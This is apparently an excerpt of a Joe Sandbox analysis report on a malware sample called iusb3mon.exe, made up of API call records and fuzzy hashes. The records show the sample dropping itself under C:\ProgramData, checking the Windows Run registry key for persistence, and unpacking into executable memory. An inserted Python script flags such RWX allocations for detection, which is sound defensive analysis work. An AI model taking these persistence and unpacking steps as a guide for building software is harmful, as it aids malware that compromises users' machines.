  • Part of subcall function 0624B39D: CreateThread.KERNEL32(?,06248D56,0624B408,00000000,00000000,?), ref: 0624B3DE
  • Part of subcall function 0624B39D: GetLastError.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624B3E8
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 06248D60
• CloseHandle.KERNEL32(?), ref: 06248D69
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
• String ID: G&
                                                                                                                    • API String ID: 3117531959-2298792099
                                                                                                                    • Opcode ID: 22feadaf96394ce2980d9b60b9636a177840e725dac3546bdb7df7431f70caab
                                                                                                                    • Instruction ID: 66f56e87c87cd1b8018c085b4f987935f2c3738c26c94283a77e4d9d05ad6b12
                                                                                                                    • Opcode Fuzzy Hash: 22feadaf96394ce2980d9b60b9636a177840e725dac3546bdb7df7431f70caab
                                                                                                                    • Instruction Fuzzy Hash: 3DF0BDB290021ABFDF01AFA4DD05CEE7BB9FB08210B504565FE25E6254E7319E219F91

                                                                                                                    Control-flow Graph

control_flow_graph 461 6247ac4-6247afa CreateFileA WriteFile 462 6247afc 461->462 463 6247afe-6247b0a CloseHandle 461->463 462->463
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06278518,06246098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06247ADA
• WriteFile.KERNEL32(00000000,06268760,00000EE2,?,00000000), ref: 06247AF2
• CloseHandle.KERNEL32(00000000), ref: 06247AFF
Strings
• C:\ProgramData\Program\iusb3mon.exe, xrefs: 06247ACA
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\ProgramData\Program\iusb3mon.exe
• API String ID: 1065093856-3106534563
• Opcode ID: 6b52916c3221ae31a7612b147a978e365c65c51a7713955c97ad0387549928fa
• Instruction ID: 448e4eb68025ff14b864a367b03e391cf5843e8e2127389ad43cc05f6cf603ed
• Opcode Fuzzy Hash: 6b52916c3221ae31a7612b147a978e365c65c51a7713955c97ad0387549928fa
• Instruction Fuzzy Hash: 03E09A7628132C7FFA201E61ACCAFEB3A0EEB01698F004121FB04E9540C6A19E408AB0

Control-flow Graph

APIs
• GetVersion.KERNEL32(?,?,?,0625CD3C), ref: 0625CDB8
• GetProcessVersion.KERNEL32(00000000,?,?,?,0625CD3C), ref: 0625CDF5
• LoadCursorA.USER32(00000000,00007F02), ref: 0625CE23
• LoadCursorA.USER32(00000000,00007F00), ref: 0625CE2E
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: CursorLoadVersion$Process
• String ID:
• API String ID: 2246821583-0
• Opcode ID: ef813a60deda1d8634fccd670bd15cb4e62a5bb4c806c1d9fd2239f0166b0b1e
• Instruction ID: 2af9b4d5c1bfdcf79fc5a8e451f2c1b3afde090e1a52cac61f04b6e3c17a8615
• Opcode Fuzzy Hash: ef813a60deda1d8634fccd670bd15cb4e62a5bb4c806c1d9fd2239f0166b0b1e
• Instruction Fuzzy Hash: C0112BB1A507508FD7749F3A989452ABBE5FB487057414D3ED587C6A40DA74A5008F90

Control-flow Graph

APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 001D121E
  • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001D6571
• GetCurrentThreadId.KERNEL32 ref: 001D6580
• GetCurrentProcessId.KERNEL32 ref: 001D6589
• QueryPerformanceCounter.KERNEL32(?), ref: 001D6596
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: CurrentTime$CounterExceptionFilePerformanceProcessQueryRaiseSystemThread___std_exception_copy
• String ID:
• API String ID: 3658488982-0
• Opcode ID: 7d736f9a5c072759fb38d3ff56b4fb5cbb659dba24ca89d17910b140c1d71e92
• Instruction ID: d5baf712bedcd8bdf24c1f15617951bb71f9d9aaed425cb673592d23bd5e592d
• Opcode Fuzzy Hash: 7d736f9a5c072759fb38d3ff56b4fb5cbb659dba24ca89d17910b140c1d71e92
• Instruction Fuzzy Hash: 2A112E30D0020DFBCF04EBF4D849A9EBBB8AF14310F504566E511E6191EB70EB55CA51

Control-flow Graph

control_flow_graph 502 6241f38-6241f5e RegOpenKeyExA 503 6241f64-6241f85 RegQueryValueExA RegCloseKey 502->503 504 6241f60-6241f62 502->504 506 6241f87-6241f8d 503->506 507 6241f8f 503->507 505 6241f94-6241f96 504->505 506->507 508 6241f91-6241f93 506->508 507->508 508->505
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F56
• RegQueryValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F72
• RegCloseKey.ADVAPI32(?,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F7D
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 7ed3abf153d33eac31457180d4dc214d092e45b0936d9f0f385142a1a77d271d
• Instruction ID: 1a4fa86dbbcf6ae4b91849679f153db0baadd2218dc5e3c1c5bfd8e866b3a378
• Opcode Fuzzy Hash: 7ed3abf153d33eac31457180d4dc214d092e45b0936d9f0f385142a1a77d271d
• Instruction Fuzzy Hash: AFF09072911308BFEF216E90DC88DFE7B6EEB04354F058422FE15A6010D7328E55AB60
APIs
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: C:\ProgramData\Program
• API String ID: 3519838083-2177086111
• Opcode ID: 40b37cc61d3b9a89804eebf1dd6e7ef1facf16d58c53ddb9b54472eb6e9e12ea
• Instruction ID: d17b18d547f1250947a2729a1a6f40685ff65733e316526cba182690034f4237
• Opcode Fuzzy Hash: 40b37cc61d3b9a89804eebf1dd6e7ef1facf16d58c53ddb9b54472eb6e9e12ea
• Instruction Fuzzy Hash: 5A415130A20205CFDB59DF58C980AADBBF1EF58324F2485A9E865D7391C731DE40CB91
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04D1022B
Memory Dump Source
• Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
• Instruction ID: 216f32c819aa4bd56a9002f64110f8c90bc2873f437e80c5aab3ff68e112038b
                                                                                                                    • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                    • Instruction Fuzzy Hash: EDA16D70A00606EFDB15DFA9D880AADB7F1FF48304F148069E855DBB61E730EA91CB90
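The VirtualAlloc record above gives its arguments only as raw hex (00000000,?,00001000,00000040). As an added example that is not part of the Joe Sandbox report, the Python below parses "APIs" lines in the form this report uses (optional "Part of subcall function" prefix, Api.MODULE, optional argument list, "ref:" address) and decodes the VirtualAlloc allocation-type and protection flags, flagging commits that are both writable and executable, the allocation pattern consistent with the "Detected unpacking (creates a PE file in dynamic memory)" signature in the overview. The sample lines are copied from records on this page except the last, which is a constructed non-executable allocation; the Win32 constant values are documented SDK values, not taken from the report.

```python
import re

# Win32 constants (documented SDK values; not taken from the report).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
MEM_TOP_DOWN = 0x100000
ALLOC_TYPE_FLAGS = {MEM_COMMIT: "MEM_COMMIT", MEM_RESERVE: "MEM_RESERVE", MEM_TOP_DOWN: "MEM_TOP_DOWN"}
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_WRITABLE = {0x40, 0x80}

# Constructed sample input: the first four lines are copied from the "APIs"
# records on this page; the last line is hypothetical (a plain RW commit) to
# show that a non-executable allocation is not flagged.
SAMPLE_API_LINES = [
    "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04D1022B",
    "• Part of subcall function 0625005D: HeapAlloc.KERNEL32(00000008,06248D56,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 06250153",
    "• GetLastError.KERNEL32 ref: 0624A1CF",
    r"• GetFileAttributesA.KERNEL32(00000000,062469AD,c:\inst.ini,00000000), ref: 0624A1C4",
    "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0624AAAA",  # hypothetical
]

# One "APIs" entry: optional subcall prefix, Api.MODULE, optional (args), ", ref: ADDR".
API_LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def parse_api_line(line):
    """Return a dict {api, module, args, ref, sub} for one report line, or None."""
    m = API_LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "sub": m.group("sub")}


def decode_arg(arg):
    """'?' is an argument the sandbox could not resolve; non-hex text (paths) stays as text."""
    if arg == "?":
        return None
    try:
        return int(arg, 16)
    except ValueError:
        return arg


def alloc_type_names(value):
    """Expand a flAllocationType bitmask into MEM_* names."""
    names = [name for bit, name in ALLOC_TYPE_FLAGS.items() if value & bit]
    return "|".join(names) if names else hex(value)


def describe_virtualalloc(rec):
    """Render a parsed VirtualAlloc record with symbolic flag names, or None if not one."""
    if rec is None or rec["api"] != "VirtualAlloc" or len(rec["args"]) < 4:
        return None
    addr, size, alloc_type, protect = (decode_arg(a) for a in rec["args"][:4])
    return ("VirtualAlloc(lpAddress={}, dwSize={}, flAllocationType={}, flProtect={}) @ {}".format(
        "NULL" if addr == 0 else ("?" if addr is None else hex(addr)),
        "?" if size is None else hex(size),
        "?" if alloc_type is None else alloc_type_names(alloc_type),
        "?" if protect is None else PROTECT_NAMES.get(protect, hex(protect)),
        rec["ref"]))


def is_rwx_alloc(rec):
    """True when a VirtualAlloc commits memory that is both writable and executable."""
    if rec is None or rec["api"] != "VirtualAlloc" or len(rec["args"]) < 4:
        return False
    alloc_type = decode_arg(rec["args"][2])
    protect = decode_arg(rec["args"][3])
    if not isinstance(alloc_type, int) or not isinstance(protect, int):
        return False
    return bool(alloc_type & MEM_COMMIT) and protect in EXECUTABLE_WRITABLE


def flag_rwx(lines):
    """Return the ref addresses of every RWX commit found in a list of report lines."""
    return [rec["ref"] for rec in map(parse_api_line, lines) if is_rwx_alloc(rec)]


if __name__ == "__main__":
    for line in SAMPLE_API_LINES:
        rec = parse_api_line(line)
        print(describe_virtualalloc(rec) or "{}.{} @ {}".format(rec["api"], rec["module"], rec["ref"]))
    print("RWX commits at:", flag_rwx(SAMPLE_API_LINES))
```

Run against the whole "APIs" section of a report, this yields the list of call sites where the unpacker stages code into fresh executable memory; the `?` handling matters because Joe Sandbox leaves unresolved arguments (here the dwSize) as a literal question mark rather than a value.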
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625005D: HeapAlloc.KERNEL32(00000008,06248D56,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 06250153
                                                                                                                    • CreateThread.KERNEL32(?,06248D56,0624B408,00000000,00000000,?), ref: 0624B3DE
                                                                                                                    • GetLastError.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624B3E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocCreateErrorHeapLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3580101977-0
                                                                                                                    • Opcode ID: 549d1114d7957db217b8384cce192d332bd7b9ec12081bb2fcb1be2b1a7811c7
                                                                                                                    • Instruction ID: 8cefd853609d5802ab5bc36755f153bbba7798608940de6bcebf952ca92e82da
                                                                                                                    • Opcode Fuzzy Hash: 549d1114d7957db217b8384cce192d332bd7b9ec12081bb2fcb1be2b1a7811c7
                                                                                                                    • Instruction Fuzzy Hash: 76F0D6366147166BCB78BF69AC0495B3BA5DF41772B008119FE2482580CB31D8019B61
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,0624B5EB,00000001), ref: 0624ED55
                                                                                                                      • Part of subcall function 0624EBFC: GetVersionExA.KERNEL32 ref: 0624EC1B
                                                                                                                    • HeapDestroy.KERNEL32 ref: 0624ED94
                                                                                                                      • Part of subcall function 0624EE49: HeapAlloc.KERNEL32(00000000,00000140,0624ED7D,000003F8), ref: 0624EE56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2507506473-0
                                                                                                                    • Opcode ID: 4003880994d9d12bbb522624bdf0dbb7a371d10391a5c93c6cb00cade3a02dce
                                                                                                                    • Instruction ID: 6f3a2222ad1e32fddbd3c3df246d21a4f2dc14f0c6e3a437a80097b25972af01
                                                                                                                    • Opcode Fuzzy Hash: 4003880994d9d12bbb522624bdf0dbb7a371d10391a5c93c6cb00cade3a02dce
                                                                                                                    • Instruction Fuzzy Hash: 6DF06570B70302DEFBF87B307C4CB293A9ABB80641F124835EED2D41D8EB6081808A12
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,062469AD,c:\inst.ini,00000000), ref: 0624A1C4
                                                                                                                    • GetLastError.KERNEL32 ref: 0624A1CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1799206407-0
                                                                                                                    • Opcode ID: 6c85f90037361986dbbf3bd76b5d01c043f37555ce3dbc6e4edb5d7b4610eaf9
                                                                                                                    • Instruction ID: 2ee4975f753b1cec827aa428edfb0de0ebe763b6a5346b092c555a922e37a9dd
                                                                                                                    • Opcode Fuzzy Hash: 6c85f90037361986dbbf3bd76b5d01c043f37555ce3dbc6e4edb5d7b4610eaf9
                                                                                                                    • Instruction Fuzzy Hash: CEE08C309783028ADBE93FB4DC4D30A7A915F42775F154A44EDB9850E8CB758440EE22
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,06248D56,00000000,00000000,00000000), ref: 0624ADC2
                                                                                                                      • Part of subcall function 0624CFF4: InitializeCriticalSection.KERNEL32(00000000,00000000,06248D56,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2), ref: 0624D031
                                                                                                                      • Part of subcall function 0624CFF4: EnterCriticalSection.KERNEL32(06248D56,06248D56,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?), ref: 0624D04C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1616793339-0
                                                                                                                    • Opcode ID: 80508e1521a8d2f5e12f41f600f1f1d690e31e77c064c46eaadf17b9c4732d0c
                                                                                                                    • Instruction ID: 2d33308ec43c6f93989859ec92522618f8677f877bf36875fdf5bd48e309a0fd
                                                                                                                    • Opcode Fuzzy Hash: 80508e1521a8d2f5e12f41f600f1f1d690e31e77c064c46eaadf17b9c4732d0c
                                                                                                                    • Instruction Fuzzy Hash: 5821C832AB0305EFDB98FF68EC45B9D77A4EB00761F144216FD21EB2C8D77499418A90
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,001D23D4,00000000), ref: 001E013B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
